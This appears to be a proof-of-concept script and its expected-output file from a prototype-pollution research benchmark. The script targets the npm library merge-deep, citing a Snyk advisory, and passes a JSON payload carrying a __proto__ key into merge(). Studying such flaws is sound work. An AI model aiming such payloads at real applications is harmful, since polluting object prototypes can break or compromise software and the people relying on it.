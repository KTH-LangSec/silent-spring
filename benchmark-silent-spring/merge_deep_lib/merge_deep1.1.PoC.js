// https://snyk.io/vuln/npm:merge-deep:20180215
  const merge = require("merge-deep");
  const malicious_payload = '{"__proto__":{"polluted":"yes"}}';
  merge({}, JSON.parse(malicious_payload));
