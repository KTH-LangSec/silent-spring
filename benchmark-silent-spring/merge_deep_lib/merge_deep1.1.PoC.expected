node_modules/merge-deep/index.js:45:19